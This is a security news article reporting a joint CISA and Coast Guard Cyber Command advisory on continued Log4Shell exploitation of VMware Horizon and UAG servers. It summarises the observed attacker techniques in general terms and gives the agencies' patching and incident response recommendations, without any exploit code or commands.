The United States Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER) have issued a joint advisory to warn organizations that threat actors continue to exploit the Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) servers.
Tracked as CVE-2021-44228, the infamous Log4Shell vulnerability that was disclosed in November 2021 impacts the widely used Apache Log4j logging tool, and is described as a critical-severity flaw leading to remote code execution.
Exploitation of the vulnerability started less than two weeks after the bug was reported, prompting organizations to prioritize the deployment of available patches.
Since December 2021, numerous threat actors have been observed exploiting the vulnerability in VMware Horizon and UAG servers, including state-sponsored advanced persistent threat (APT) actors. VMware released fixes for this vulnerability in early December 2021.
Following successful exploitation, the adversaries deploy malicious loaders and eventually gain remote control of the compromised systems. In one attack, CISA and CGCYBER say, the threat actors managed to move laterally to a disaster recovery network and exfiltrated sensitive data.
The joint Cybersecurity Advisory (CSA) from CISA and CGCYBER provides details on the tactics, techniques, and procedures (TTPs) employed by threat actors in the observed attacks, along with incident response recommendations.
Attackers can exploit Log4Shell via specially crafted requests that will result in the execution of arbitrary code. Because of the bug, a broad range of consumer and enterprise applications, services, websites, and other products are exposed to potential attacks.
During one of the observed attacks, the threat actors deployed a remote access tool that could log keystrokes, deploy and run payloads, and provide access to the compromised system’s desktop. Functioning as a command and control (C&C) tunneling proxy, the malware also allowed the attackers to move laterally.
While investigating the compromise of another victim, CISA discovered intrusions from multiple threat actors, some of which had access to the environment since late January 2022 or earlier. The attackers likely exploited Log4Shell in an unpatched VMware Horizon server for initial access.
Following initial access, the threat actors used PowerShell scripts to deploy additional payloads, and moved laterally using the Remote Desktop Protocol (RDP), compromising multiple systems, including the victim’s disaster recovery network, and deployed malware that provided them with monitoring capabilities, reverse shell access, payload delivery, and data exfiltration capabilities.
When identifying a potential breach, CISA and CGCYBER say, administrators should isolate the affected systems, collect and review logs and artifacts, engage with an incident response firm if necessary, and report the incident to CISA or the US Coast Guard (USCG) National Response Center (NRC).
To mitigate risks, organizations are advised to update their VMware Horizon and UAG systems so that they are patched against Log4Shell, and to treat unpatched systems as if they have been compromised. Keeping all software updated at all times, applying network segmentation, implementing multi-factor authentication and best practices for identity and access management (IAM) should also mitigate risks.
“Until the [VMware] update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible,” the CSA reads.